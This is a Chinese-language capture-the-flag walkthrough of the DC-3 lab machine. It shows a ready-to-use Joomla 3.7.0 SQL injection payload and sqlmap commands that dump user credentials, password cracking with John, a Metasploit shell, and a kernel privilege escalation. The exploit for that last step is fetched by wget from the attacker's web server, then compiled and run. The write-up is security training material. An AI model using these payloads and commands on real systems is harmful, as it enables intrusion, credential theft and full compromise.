环境下载:
DC and Five86 Series Challenges - DC-3
虚拟机配置:
这里还需要更改
完成之后就可以开始了
信息探测,寻找FLAG
利用nmap进行主机探测,发现目标靶机IP
进行端口探测,发现80端口开启,并且使用使是Joomla cms ,我们去先浏览器进行登录
根据提示我们可以知道这一关只有一个FLAG,并且需要我们获得root权限
这里我们再进行敏感目录扫描一下,发现含有一个登录页面,我们把他打开
将登录页面打开
工具利用,漏洞扫描
在这个页面我们使用AWVS进行漏洞扫描
在这里我们可以发现此网站存在SQL注入,并且使用的Joomla为3.7.0版本,接下来我们去kali中进行漏洞搜索
我们将SQL注入的txt打开 查看详细信息
我们可以看到当中有我们可以直接使用的Sqlmap的payload,接下来就进行爆库
payload:
http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)
sqlmap -u "http://192.168.100.12/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --dbs
接下来进行爆表
sqlmap -u "http://192.168.100.12/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables
接下来进行爆字段
sqlmap -u "http://192.168.100.12/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns --dump
我们得到
用户名:admin
密码:2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
此密码被加密了,我们可以使用kali中的John解密
创建文件
touch admin.txt #创建文件
vi admin.txt #编辑
john admin.txt #破解
解密完成,我们得到密码为snoopy,接下来去网站进行登录
我们成功进入了后台
权限提升
我们刚才发现了此网站所使用的cms为joomla3.7.0版本,对此我们去metasploit中进行攻击
我们成功进入(但是为空指针模式,但由于对作者并不影响所以没有进行生成虚拟终端操作)
我们CD至root目录下,发现操作不行,并且SUID啥的都不行,所以我们考虑进行系统漏洞提权
我们查看一下靶机的发行版本信息
cat /etc/*release #查看发行版信息
接下来查看kali中的漏洞库信息,发现39772.txt的可以使用
searchsploit Ubuntu 16.04
接下来我们查看exp
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
写了exp地址,我们打开进行下载
但是此路径已经发现改变,新的URL为:bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab
我们将其下载,打开Apache服务,并移动到指定目录下
systemctl start apache2.service
mv 39772.zip /var/www/html
接下来我们回到刚才的DC3 shell界面将其下载下来
wget http://192.168.79.128/39772.zip
接下来进行解压zip,cd 39772 等操作
unzip 39772.zip #解压39772.zip
cd 39772 #进入39772
tar -xvf exploit.tar #解压缩exploit.tar
我们进入 ebpf_mapfd_doubleput_exploit 运行exp
cd ebpf_mapfd_doubleput_exploit
运行方法:
./compile.sh
./doubleput
稍等一两分钟后进入root目录 ,发现FLAG文件,进行查看
完成!成功获取FLAG文件